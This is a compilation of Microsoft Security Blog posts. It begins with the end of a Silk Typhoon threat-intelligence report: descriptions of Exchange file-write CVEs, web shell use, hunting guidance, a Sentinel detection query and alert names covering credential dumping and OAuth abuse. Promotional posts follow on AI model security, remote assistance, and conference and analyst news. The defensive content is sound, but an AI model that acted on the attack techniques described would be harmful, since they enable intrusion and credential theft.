CVE-2021-26858 – A post-authentication arbitrary file write vulnerability in Exchange. If Silk Typhoon could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator’s credentials.
CVE-2021-27065 – A post-authentication arbitrary file write vulnerability in Exchange. If Silk Typhoon could authenticate with the Exchange server, then it could use this vulnerability to write a file to any path on the server. It could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator’s credentials.

During recent activities and historical exploitation of these appliances, Silk Typhoon utilized a variety of web shells to maintain persistence and to allow the actors to remotely access victim environments.

Hunting guidance

To help mitigate and surface various aspects of recent Silk Typhoons activities, Microsoft recommends the following:

Inspect log activity related to Entra Connect serversfor anomalousactivity.
Where these targeted applications have highly privileged accounts, inspect service principals for newly created secrets (credentials).
Identify and analyze any activity related to newly created applications.
Identify all multi-tenant applications and scrutinize authentications to them.
Analyze any observed activity related to use of Microsoft Graph or eDiscovery particularly for SharePoint or email data exfiltration
Look for newly created users on devices impacted by vulnerabilities targeted by Silk Typhoon and investigate virtual private network (VPN) logs for evidence of VPN configuration modifications or sign-in activity during the possible window of compromise of unpatched devices.

Microsoft Sentinel

Microsoft Sentinel customers can use the following queries to detect behavior associated with Silk Typhoon:

Customers can use the following query to detect vulnerabilities exploited by Silk Typhoon:

DeviceTvmSoftwareVulnerabilities | where CveId in ("CVE-2025-0282") | project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion, CveId,VulnerabilitySeverityLevel | join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId | project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion, CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware Recommendations

To help detect and mitigate Silk Typhoon’s activity, Microsoft recommends the following:

Ensure all public facing devices are patched. It’s important to note that patching a vulnerable device does not remediate any post-compromise activities by a threat actor who gained privileged access to a vulnerable device.
Validate any Ivanti Pulse Connect VPN are patched to address CVE-2025-0282 and run the suggested Integrity Checker Tool as suggested in their Advisory. Consider terminating any active or persistent sessions following patch cycles.
Defend against legitimate application and service principal abuse by establishing strong controls and monitoring for these security identities. Microsoft recommends the following mitigations to reduce the impact of this threat:
- Audit the current privilege level of all identities, users, service principals, and Microsoft Graph Data Connect applications (use the Microsoft Graph Data Connect authorization portal) to understand which identities are highly privileged. Scrutinize privileges more closely if they belong to an unknown identity, belong to identities that are no longer in use, or are not fit for purpose. Admins may assign identities privileges over and above what is required. Defenders should pay attention to apps with app-only permissions as those apps might have over-privileged access. Read additional guidance for investigating compromised and malicious applications.
- Identify abused OAuth apps using anomaly detection policies. Detect abused OAuth apps that make sensitive Exchange Online administrative activities through App governance. Investigate and remediate any risky OAuth apps.
- Review any applications that hold EWS.AccessAsUser.All and EWS.full_access_as_app permissions and understand whether they are still required in the tenant. If they are no longer required, they should be removed.
- If applications must access mailboxes, granular and scalable access can be implemented using role-based access control for applications in Exchange Online. This access model ensures applications are only granted to the specific mailboxes required.
Monitor for service principal sign-ins from unusual locations. Two important reports can provide useful daily activity monitoring:
- The risky sign-ins report surfaces attempted and successful user access activities where the legitimate owner might not have performed the sign-in.
- The risky users report surfaces user accounts that might have been compromised, such as a leaked credential that was detected or the user signing in from an unexpected location in the absence of planned travel.
Defend against credential compromise by building credential hygiene, practicing the principle of least privilege, and reducing credential exposure. Microsoft recommends the following mitigations to reduce the impact of this threat.
Implement the Azure Security Benchmark and general best practices for securing identity infrastructure, including:
- Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.
- Ensure that “break glass” account passwords are stored offline and configure honey-token activity for account usage.
- Implement Conditional Access policies enforcing Microsoft’s Zero Trust principles.
Enable risk-based user sign-in protection and automate threat response to block high-risk sign-ins from all locations and enable multifactor authentication (MFA) for medium-risk ones.
Ensure that VPN access is protected using modern authentication methods.
Identify all multi-tenant applications, assess permissions, and investigate suspicious sign-ins.

Indicators of compromise

Silk Typhoon is not known to use their own dedicated infrastructure in their operations. Typically, the threat actor uses compromised covert networks, proxies, and VPNs for infrastructure, likely to obfuscate their operations. However, they have also been observed using short-lease virtual private server (VPS) infrastructure to support their operations.

Microsoft Defender XDR detections

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

Silk Typhoon activity group

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

Possible exploitation of Exchange Server vulnerabilities
Suspicious web shell detected
Suspicious Active Directory snapshot dump
Suspicious credential dump from NTDS.dit

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate associated threat activity:

Suspicious Interactive Logon to the Entra Connect Server
Suspicious writeback by Entra Connect on a sensitive user
User Password Reset by Entra Connect Account
Suspicious Entra sync password change

Microsoft Defender XDR

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

Suspicious activities related to Azure Key Vault by a risky user

Microsoft Defender for Cloud

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

Unusual user accessed a key vault
Unusual application accessed a key vault
Access from a suspicious IP to a key vault
Denied access from a suspicious IP to a key vault

Microsoft Defender for Cloud Apps

The following Microsoft Defender for Cloud Apps alerts can indicate associated threat activity if app governance is enabled:

Unusual addition of credentials to an OAuth app
Suspicious credential added to dormant app
Unused app newly accessing APIs
App with suspicious metadata has Exchange permission
App with an unusual user agent accessed email data through Exchange Web Services
App with EWS application permissions accessing numerous emails
App made anomalous Graph calls to Exchange workload post certificate update or addition of new credentials
Suspicious user created an OAuth app that accessed mailbox items
Suspicious OAuth app used for collection activities using Graph API
Risky user updated an app that accessed Email and performed Email activity through Graph API
Suspicious OAuth app email activity through Graph API
Suspicious OAuth app email activity through EWS API

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065

Microsoft Defender External Attack Surface Management

Attack Surface Insights with the following title can indicate vulnerable devices on your network but is not necessarily indicative of exploitation:

[Potential] CVE-2024-3400 – Palo Alto Networks PAN-OS Command Injection Vulnerability’
[Potential] CVE-2023-3519 – Citrix NetScaler ADC and Gateway Unauthenticated
ProxyLogon – Microsoft Exchange Server Vulnerabilities (Hotfix Available)

Note: An Attack Surface Insight marked as [Potential] indicates a service is running but cannot validate whether that service is running a vulnerable version. Customers should check resources to verify that they are up to date as part of their investigation.

Microsoft Security Copilot

Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article (see Threat intelligence reports below)
Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft Defender Threat Intelligence

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Silk Typhoon targeting IT supply chain appeared first on Microsoft Security Blog.

Categories: Microsoft

Securing generative AI models on Azure AI Foundry

Microsoft Malware Protection Center - Tue, 03/04/2025 - 1:00pm

New generative AI models with a broad range of capabilities are emerging every week. In this world of rapid innovation, when choosing the models to integrate into your AI system, it is crucial to make a thoughtful risk assessment that ensures a balance between leveraging new advancements and maintaining robust security. At Microsoft, we are focusing on making our AI development platform a secure and trustworthy place where you can explore and innovate with confidence.

Here we’ll talk about one key part of that: how we secure the models and the runtime environment itself. How do we protect against a bad model compromising your AI system, your larger cloud estate, or even Microsoft’s own infrastructure?

How Microsoft protects data and software in AI systems

But before we set off on that, let me set to rest one very common misconception about how data is used in AI systems. Microsoft does not use customer data to train shared models, nor does it share your logs or content with model providers. Our AI products and platforms are part of our standard product offerings, subject to the same terms and trust boundaries you’ve come to expect from Microsoft, and your model inputs and outputs are considered customer content and handled with the same protection as your documents and email messages. Our AI platform offerings (Azure AI Foundry and Azure OpenAI Service) are 100% hosted by Microsoft on its own servers, with no runtime connections to the model providers. We do offer some features, such as model fine-tuning, that allow you to use your data to create better models for your own use—but these are your models that stay in your tenant.

So, turning to model security: the first thing to remember is that models are just software, running in Azure Virtual Machines (VM) and accessed through an API; they don’t have any magic powers to break out of that VM, any more than any other software you might run in a VM. Azure is already quite defended against software running in a VM attempting to attack Microsoft’s infrastructure—bad actors try to do that every day, not needing AI for it, and AI Foundry inherits all of those protections. This is a “zero-trust” architecture: Azure services do not assume that things running on Azure are safe!

What is Zero Trust?

Learn more

Now, it is possible to conceal malware inside an AI model. This could pose a danger to you in the same way that malware in any other open- or closed-source software might. To mitigate this risk, for our highest-visibility models we scan and test them before release:

Malware analysis: Scans AI models for embedded malicious code that could serve as an infection vector and launchpad for malware.

Vulnerability assessment: Scans for common vulnerabilities and exposures (CVEs) and zero-day vulnerabilities targeting AI models.

Backdoor detection: Scans model functionality for evidence of supply chain attacks and backdoors such as arbitrary code execution and network calls.

Model integrity: Analyzes an AI model’s layers, components, and tensors to detect tampering or corruption.

You can identify which models have been scanned by the indication on their model card—no customer action is required to get this benefit. For especially high-visibility models like DeepSeek R1, we go even further and have teams of experts tear apart the software—examining its source code, having red teams probe the system adversarially, and so on—to search for any potential issues before releasing the model. This higher level of scanning doesn’t (yet) have an explicit indicator in the model card, but given its public visibility we wanted to get the scanning done before we had the UI elements ready.

Defending and governing AI models

Of course, as security professionals you presumably realize that no scans can detect all malicious action. This is the same problem an organization faces with any other third-party software, and organizations should address it in the usual manner: trust in that software should come in part from trusted intermediaries like Microsoft, but above all should be rooted in an organization’s own trust (or lack thereof) for its provider.

For those wanting a more secure experience, once you’ve chosen and deployed a model, you can use the full suite of Microsoft’s security products to defend and govern it. You can read more about how to do that here: Securing DeepSeek and other AI systems with Microsoft Security.

And of course, as the quality and behavior of each model is different, you should evaluate any model not just for security, but for whether it fits your specific use case, by testing it as part of your complete system. This is part of the wider approach to how to secure AI systems which we’ll come back to, in depth, in an upcoming blog.

Using Microsoft Security to secure AI models and customer data

In summary, the key points of our approach to securing models on Azure AI Foundry are:

Microsoft carries out a variety of security investigations for key AI models before hosting them in the Azure AI Foundry Model Catalogue, and continues to monitor for changes that may impact the trustworthiness of each model for our customers. You can use the information on the model card, as well as your trust (or lack thereof) in any given model builder, to assess your position towards any model the way you would for any third-party software library.

All models hosted on Azure are isolated within the customer tenant boundary. There is no access to or from the model provider, including close partners like OpenAI.

Customer data is not used to train models, nor is it made available outside of the Azure tenant (unless the customer designs their system to do so).

Learn more with Microsoft Security

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Securing generative AI models on Azure AI Foundry appeared first on Microsoft Security Blog.

Categories: Microsoft

Rethinking remote assistance security in a Zero Trust world

Microsoft Malware Protection Center - Wed, 02/26/2025 - 12:00pm

The recent breach of the United States Treasury underscores a stark reality: cyber adversaries are no longer just looking for gaps in traditional network security—they are actively exploiting the tools organizations rely on for daily operations. Remote assistance technologies, essential for IT support and business continuity, have become prime targets for credential theft, moving within the network, and system exploitation. The message is clear: securing remote assistance is no longer optional; it is a fundamental requirement for maintaining operational resilience.

A multi-pronged approach to securing remote assistance with Zero Trust

For too long, remote assistance security has been presumed rather than intentionally designed into its architecture. The rise in sophisticated cyberthreats demands a fundamental shift in our approach. Organizations must rethink remote assistance security through the lens of Zero Trust, using the three key principles of verify explicitly, use least privilege, and assume breach as a guide and ensuring that every session, user, and device is verified, compliant, and monitored before access is granted.

Discover how implementing Zero Trust can fortify your remote assistance security by visiting our Zero Trust Workshop, where you’ll find an interactive guide to embedding security into your IT operations.

This requires a structured approach with a foundation of:

Identity and access control—ensuring that only authenticated, compliant users and devices can initiate or receive remote assistance.
Endpoint security and compliance—enforcing security baselines and conditional access across all managed devices.
Embedded security in remote assistance—building security into the very foundation of remote assistance tools, eliminating gaps that cyberattackers can exploit.

Explore the Microsoft Zero Trust approach

Identity and access control: The first line of cybersecurity defense

Identity security is the cornerstone of any secure remote assistance strategy. A compromised identity is often the first step in a cyberattack, making it critical to ensure only verified users and devices can initiate or receive remote assistance sessions. Organizations must enforce:

Explicit identity verification—using multi-factor authentication (MFA) and risk-based conditional access to ensure only authorized users gain access.
Least privilege access—ensuring remote assistance is granted only for the necessary duration and with minimal privileges to reduce the risk of exploitation.
Real-time risk assessment—continuously evaluating access requests for anomalies or suspicious activity to prevent unauthorized access.

By shifting the security perimeter to identity, organizations create an environment where trust is earned dynamically, not assumed.

Closing the gaps with endpoint security and compliance with Microsoft Intune

Cyberattackers frequently exploit outdated, misconfigured, or non-compliant endpoints to gain a foothold in enterprise environments. IT and security leaders must ensure that remote assistance is built on a strong endpoint security foundation, where every device connecting to corporate resources meets strict compliance standards. This highlights the need for organizations to establish consistent security policies across all devices, ensuring they are up to date and compliant before being granted remote access.

Microsoft Intune provides the necessary tools to:

Enforce compliance policies—restrict remote assistance to managed, up-to-date, and policy-compliant devices.
Apply security baselines—standardize configurations across endpoints to minimize security gaps.
Integrate with Microsoft’s security ecosystem—connecting remote assistance workflows with Microsoft Entra, Microsoft Defender product family, and other security tools for real-time monitoring and cyberthreat mitigation.

Discover more about Microsoft Intune Remote Help: Secure remote assistance built for Zero Trust

As organizations work toward a Zero Trust model, secure remote assistance must align with core security principles. This means moving beyond reactive security measures and embedding proactive, policy-driven controls into every remote session. Microsoft Intune Remote Help was designed with these imperatives in mind, providing a robust solution that enhances IT support while minimizing security risks.

While legacy remote assistance tools can lack enterprise-grade security controls, Remote Help is built to align with Zero Trust principles. Unlike traditional solutions, Remote Help:

Integrates directly with Microsoft Entra ID—enhancing security where authentication and access controls can consistently take place.
Provides session transparency—IT teams can track and monitor remote assistance activity in real time.
Enforces compliance requirements—only compliant, managed devices can participate in remote assistance sessions.

For highly regulated industries, Remote Help offers an alternative to third-party tools that may introduce security blind spots. By embedding security directly into remote assistance workflows, organizations can significantly reduce the risk of unauthorized access.

Start a free trial of Microsoft Intune Remote Help Engaging customers and partners to strengthen cyber resilience

Cybersecurity is a team sport. As cyberthreat actors grow more sophisticated, collaboration across industries is essential. Microsoft is committed to engaging with customers and partners to drive security innovation and resilience. Initiatives such as the Windows Resiliency Initiative (WRI) focus on:

Reducing the need for admin privileges—helping organizations adopt a least privilege approach at scale.
Enhancing identity protection—strengthening defenses against phishing and identity-based attacks.
Quick machine recovery—empowering IT teams with tools to rapidly store compromised devices remotely.

By fostering collaboration and continuously evolving security measures, Microsoft is helping organizations stay ahead of emerging cyberthreats. These on-going conversations with our customers and partners are crucial in shaping resilient security strategies that adapt to an ever-changing cyberthreat landscape.

A security-first approach for the future

The increasing reliance on remote assistance demands a security-first mindset. Organizations must recognize that every remote access session presents an opportunity for exploitation from an ever-evolving cast of cyberattackers. Rather than treating security as an afterthought, it must be deeply integrated into the architecture of the remote assistance solutions. A modern approach requires proactive risk mitigation, continuous verification, and seamless security controls that support productivity without compromising protection.

Now is the time for IT and security leaders to:

Evaluate your current remote assistance tools—identifying the gaps and areas for improvement.
Adopt Zero Trust principles—ensuring the access is verified and explicitly and continuously monitored.
Leverage solutions like Microsoft Intune and Remote Help—deploying secure, enterprise-grade remote assistance capabilities.

By taking these steps, you can strengthen your security posture, minimize risk, and ensure that remote assistance remains a tool for operational efficiency rather than a gateway for cyberthreats.

To explore how Zero Trust can enhance your remote assistance security, visit the Zero Trust Workshop, an interactive, step-by-step guide to embedding security into every layer of IT operations, ensuring a comprehensive and measurable approach to security transformation.

Explore the Zero Trust Workshop Learn more with Microsoft Security

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Rethinking remote assistance security in a Zero Trust world appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview

Microsoft Malware Protection Center - Thu, 02/20/2025 - 12:00pm

Generative AI is reshaping almost every industry and the legal field is no different. A Thompson Reuters Institute study of legal professionals found “a remarkable 79% of law firm respondents anticipate AI will have a high or transformational impact on their work within the next five years—a significant 10-point increase from 2023.”1 There are many promising opportunities to streamline workflows and drive efficiency by bringing AI into legal and litigation workflows. Simultaneously, there’s a need to ensure data compliance, security, governance, and privacy while deploying AI throughout your organization.

Learn more about Microsoft Security.

Microsoft is continuously innovating, empowering people and organizations to achieve more, and Microsoft Purview is a key part of that mission. New advanced capabilities in Microsoft Purview eDiscovery make it easier to safeguard and manage compliance of data. eDiscovery allows you to easily search, collect, and review AI-based interactions across more than 25 AI applications. It also uses advanced AI capabilities to streamline eDiscovery workflows—from natural language queries for more intuitive searching to automatic case summarization for a quick snapshot of key insights. And more powerful AI-driven features are on the horizon to further accelerate and simplify the eDiscovery process.

We are excited to share more about new developments across Microsoft Security at Legalweek 2025. If you are attending the conference in New York City from March 24 to March 27, 2025, we’d love to connect. Read on for an overview of our sessions. And request to attend our Executive Breakfast on Tuesday, March 25, 2025, from 7:30am–8:45am (ET) at the Mercury Ballroom, New York Hilton Midtown, to learn how to protect Microsoft 365 Copilot with Microsoft Purview as well as our latest developments in eDiscovery.

Mark your calendar for these Legalweek sessions

At Legalweek 2025, we will have experts from Microsoft and the legal field to offer insights into the latest cybersecurity challenges facing the legal sector as well as strategies to tackle these pressing issues.

Session TitleSpeakersSession Date and TimeSession DescriptionTrustworthy AI: Helping to ensure privacy and security in AI transformation Katelyn Rothney, Senior Product Marketing Manager, Microsoft Azure AI; Ashley Pusey, Cyber Security and Data Privacy Associate, Kennedy’s CMP LLP; Rebecca Engrav, co-chair of the AI industry group at Perkins Coie; and John Israel, Global AI Security and Data Security Lead, KPMG. Tuesday, March 25, 2025, 11:30 AM–12:30 PM Eastern Time (ET) This session will delve into the complex interplay between AI innovation and data protection, exploring the necessary frameworks for designing AI solutions that prioritize transparency, integrity, and accountability. Learn the security and privacy risks inherent in AI adoption and how to mitigate them. Global compliance deep dive: Mastering the EU AI Act and international data regulationsManny Sahota, Director of Global Cloud Privacy, Regulatory Risk, and Compliance, Microsoft; Dajin Li, Partner, Taylor Wessing; Jennifer Driscoll, Partner, Robinson Cole; Jessica Long, Vice President, Head of Legal, Chief Privacy Officer, Allstate Canada; and Patrick J. Austin, Of Counsel, Woods Rogers. Tuesday, March 25, 2025, 2:00 PM–3:00 PM (ET) Navigate the complexities of global data compliance and learn how to stay ahead of regulatory requirements with an in-depth analysis of the EU AI Act and other key international regulations. Learn how to harmonize compliance strategies across different jurisdictions, overcome regulatory challenges, and future-proof your organization’s data governance framework. Collaboration in complex litigation: Streamlining team communication and document sharing EJ Bastien, Sr. Director, Discovery Programs, Microsoft; Lindsey Lanier, Director, Product Management, Relativity; Candi Smith, eDiscovery Analyst, Disney; Scott Milner, Partner & Global Practice Group Leader of eData, Morgan, Lewis & Bockius LLP; and Greg Buckles, Market Analyst–Press, eDiscovery Journal.Tuesday, March 25, 2025, 3:30 PM–4:30PM (ET) Explore how legal teams can streamline document sharing and optimize communication workflows to keep all stakeholders connected and informed. Learn how to simplify case management, enhance team collaboration, and make information easily accessible—even in hybrid work environments. Navigating the AI revolution: Strategic insights and innovations Jessica Escalera, Head of Legal Operations, Americas at HSBC; Nicole Langston, Head of eDiscovery, Counsel for Barclays; Nisha Narasimhan, Principal Product Manager, Microsoft; and Robert Keeling, Partner, Redgrave LLPWednesday, March 26, 2025, 11:30 AM–12:30PM (ET) This forward-looking panel discussion delves into how you can use cutting-edge products to steer your AI journey effectively. Join industry experts as they share insights on strategic approaches, address common challenges, and highlight the latest AI innovations. Connect with Microsoft at Legalweek

If you seek strategies for safeguarding and managing the compliance of your data and AI applications, check out one or more of our sessions at Legalweek. Throughout the conference, you can also interact with our Microsoft experts directly in a few ways:

Stop by Booth #3103 in New York Hilton Midtown Americas Hall 2 to learn how Microsoft solutions can address your challenges.
Request to attend the Executive Breakfast on Tuesday, March 25, 2025 from 7:30am – 8:45am ET at Mercury Ballroom, New York Hilton Midtown.
Request dedicated time with our experts, who will be available in meeting rooms at 1700 Broadway, between 9:00 AM – 6:00 PM ET, Monday, March 24, 2025, through Thursday, March 27, 2025. We’d love to connect. Hope to see you there!

Connect with members of the Microsoft Intelligent Security Association

At Microsoft we truly believe security is a team sport. And we are thrilled to welcome three of our strategic Microsoft Intelligent Security Association (MISA) members to demonstrate their solutions at the Microsoft booth. Join Epiq Global, Lighthouse, and Relativity as they share their expertise and discuss how their solutions—together with Microsoft technology—are helping our mutual customers secure their data efficiently in the age of AI.

Epiq Global: Tuesday, March 25, 2025, 12:00 – 2:00 PM ET
Lighthouse: Wednesday, March 26, 2025, 2:30 – 4:30 PM ET
Relativity: Thursday, March 27, 2025, 10:00 AM – 12:00 PM ET

Read more about MISA and membership benefits.

Learn more about Microsoft Security solutions

To help your organization efficiently respond to legal matters or internal investigations with intelligent capabilities that reduce data to only what’s relevant, learn more about Microsoft Purview eDiscovery.

Learn how to accelerate the secure adoption of AI with ready-to-go security and governance tools built for generative AI at The Microsoft at RSAC experience. From our signature Pre-Day to demos and networking, discover how Microsoft Security can give you the advantage you need in the era of AI.

To learn more about Microsoft Security, visit our website.

 Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

Sources:

1 The Future of Professionals: How AI is impacting the legal profession | Legal Blog

The post Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms

Microsoft Malware Protection Center - Wed, 02/19/2025 - 12:00pm

Critical infrastructure is a key target of both physical and cyberattacks. Microsoft has observed an increase in reported attacks on internet-exposed operational technology (OT) devices that control real-world critical processes—like water and wastewater systems, as well as critical functions across industries including healthcare, manufacturing, energy, and more.1 Our previous Microsoft Digital Defense Reports have shown that unfortunately the security of OT devices has not kept pace with the strengthened security of IT hardware and software. As of July 2024, we had identified and shared more than 300 vulnerabilities in third-party OT applications. The initiative contributed to significant improvements in security across the OT industry.1 It highlights a need for organizations to integrate OT devices into their broader endpoint security strategy. 

We are excited to announce that Gartner has named Microsoft a Leader in the 2025 Gartner® Magic Quadrant™ for Cyber Physical Systems Protection Platforms. Gartner defines cyber-physical systems (CPS) as “engineered systems that orchestrate sensing, computation, control, networking and analytics” that connect the digital and physical worlds. They span industrial control systems (ICS), OT devices, Internet of Things (IoT) devices, and more.  

CPS devices are an inherent component to any security strategy, and as the only security platform vendor now recognized as a Leader in both endpoint and CPS security, it highlights, in our opinion, our commitment to providing customers with holistic endpoint security on any platform. Our cross-platform strategy is key to making continued progress in helping organizations protect their endpoints against the latest, and most sophisticated cyberattacks as they span operating systems and cross into CPS infrastructure, while driving continued efficiency for security operations center (SOC) teams. Read the report here. 

Meeting the unique OT security needs of organizations in every major industry 

The core of Microsoft’s CPS offering to help secure OT environments is Microsoft Defender for IoT, which provides CPS capabilities though purpose-built sensors, and combined with Defender for Endpoint, helps provide holistic endpoint security to organizations worldwide. Both are native components of our unified security operations platform. 

CPS security is deeply embedded into Microsoft’s approach to securing devices across the platforms our customers operate on. Defender for Endpoint uses its network traffic insights to discover devices that it centralizes in a unified device inventor; we provide holistic vulnerability management for software on both user, as well as CPS devices, and bring information together in a unified incident investigation experience to enable analysts to investigate endpoint-focused attacks end-to-end.

Further, Microsoft is deeply committed to helping customers achieve cost efficiencies through our strategic Microsoft 365 E5 Security bundles, while equally allowing maximum purchasing flexibility through our standalone offers for each solution. 

Secure your enterprise IoT devices with Microsoft Defender for IoT Innovations that drive better defense strategies 

Over the last 12 months, Microsoft has delivered significant innovations that help defenders gain the upper hand against OT and other cyberthreats including:  

Microsoft’s unified security operations platform brings the foundational tools a SOC needs into a single experience, with a consistent data model, unified capabilities, and broad protection. This unified experience helps SOCs close critical security gaps and streamline their operations, delivering better overall protection, reducing their response time by 88%, and improving overall efficiency.2 Defender for IoT is core to this platform, which combines the power of leading solutions in security information and event management (SIEM), extended detection and response (XDR), and Generative AI for security. It enables security teams to detect and respond to cyberthreats across OT environments and get key insights into their OT security posture, detect cyberthreats, and understand them in context of broader incidents. 

The unified agent combines protection across endpoints, OT devices, identities and data loss prevention (DLP) to help security teams streamline deployment and protection. The sensor is the software component that monitors and protects critical infrastructure, serving as one of the first lines of defense against cyberthreat actors. With our platform approach that brings together Microsoft Sentinel and Microsoft Defender XDR, we now have the first platform-level platform-level agent that unifies protection across four solution areas. The streamlined agent simplifies how you activate and manage core capabilities to more easily and swiftly reap the benefits of our AI-powered protection. Read more about the unified agent platform on the Microsoft Defender for Endpoint blog. 

Microsoft Security Exposure Management is part of the unified security operations portal and provides a unified view of security posture across company assets and workloads. Security initiatives are an experience that provides a simple way to assess security readiness for a specific security area or workload, and to constantly track and measure exposure risk over time. The OT Security initiative improves your OT site security posture by monitoring and protecting OT environments in the organization, and employing network layer monitoring. This initiative identifies devices and ensures that systems are working correctly, and data is protected. Your security teams can use the OT Security initiative to identify unprotected devices and harden posture across sites through vulnerability assessments, with actionable guidance to help remediate at-risk devices. Read more about security initiatives.  

Reduce risk and optimize your security posture with Microsoft Security Exposure Management

Thank you to all our customers. You inspire us as together we work to create a safer world. 

Learn more with Microsoft Security

Visit Microsoft Defender for IoT to learn how your organization can get real-time asset discovery, vulnerability management, and cyberthreat protection for your Internet of Things (IoT) and industrial infrastructure, such as industrial control systems (ICS) and operational technology (OT).  

Are you a regular user of Microsoft Defender for Endpoint or Defender for IoT? Review your experience on Gartner Peer Insights™ and get a $25 gift card.     

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity. 

1Microsoft Digital Defense Report, Microsoft. 2024.
2The Total Economic Impact™ Of Microsoft SIEM And XDR, August 2022.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft. 

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. 

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. 

Gartner, Magic Quadrant for CPS Protection Platforms, 17 February 2025, By Katell Thielemann, Wam Voster, Ruggero Contu.

The post Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms appeared first on Microsoft Security Blog.

Categories: Microsoft

Join us for the end-to-end Microsoft RSAC 2025 Conference experience

Microsoft Malware Protection Center - Tue, 02/18/2025 - 12:00pm

AI adoption is picking up speed. Many companies are growing their technology estates by embracing powerful new solutions like generative AI. But to maximize the benefits of new technology with confidence, security professionals need to stay compliant with the evolving regulatory and audit requirements in the age of AI. It is in this spirit that Microsoft invites you to join us at RSACTM 2025 Conference in San Francisco, where we will showcase end-to-end security designed to help organizations accelerate the secure adoption of AI with ready-to-go security and governance tools and solutions to multiply security teams’ productivity.

Across the Microsoft Security portfolio, our innovations, together with world-class threat and regulatory intelligence, will help give security experts the advantage they need in the era of AI. From our signature Pre-Day to hands-on demos and one-on-one meetings, join the Microsoft experience at RSAC 2025 designed just for you.

Microsoft at RSAC

From our signature Pre-Day to hands-on demos and one-on-one meetings, discover how Microsoft Security can give you the advantage you need in the era of AI.

Explore events Kick things off at Microsoft Pre-Day

The Microsoft experience at RSAC 2025 begins with Microsoft Pre-Day on Sunday, April 27, 2025, at the Palace Hotel, just around the corner from the Moscone Center. For the fourth year running, the keynote speech held on Microsoft Pre-Day will kick off the full lineup of Microsoft events and activities throughout RSAC 2025. By joining us on Sunday, you’ll have the chance to hear directly from Microsoft Security business leaders—including Vasu Jakkal, Corporate Vice President, Microsoft Security Business; Charlie Bell, Executive Vice President, Microsoft Security; Sherrod DeGrippo, Director of Threat Intelligence Strategy; and other Microsoft Security leaders as they share reporting on emerging cyberthreat trends and the product innovations designed to protect against them. Vasu will also take the RSAC 2025 stage on Day 1 for the conference keynote.

At Pre-Day, attendees will hear Microsoft Security threat intelligence on emerging trends, explore new AI-first tools, demos, and best practices, and attain a better understanding of how Microsoft can help them secure and govern their AI deployments. Attend to discover how the adaptive, end-to-end security platform from Microsoft, including Microsoft Security Copilot, can help your team catch what others miss, speed up remediation, lower your total cost of ownership, and boost—rather than burden—you and your teams.

Stick around after Pre-Day for the reception—an evening of fun, networking, and entertainment, celebrating the vibrant security community. This is a unique opportunity to meet Microsoft security leaders, expand your professional network, and learn how others are addressing the latest security trends and challenges. Light refreshments will be served. CISOs who register to attend Microsoft Pre-Day will automatically be invited to a chief information security officer (CISO) dinner with Vasu Jakkal.

Make sure to register for Microsoft Pre-Day to join in on all the day’s activities.

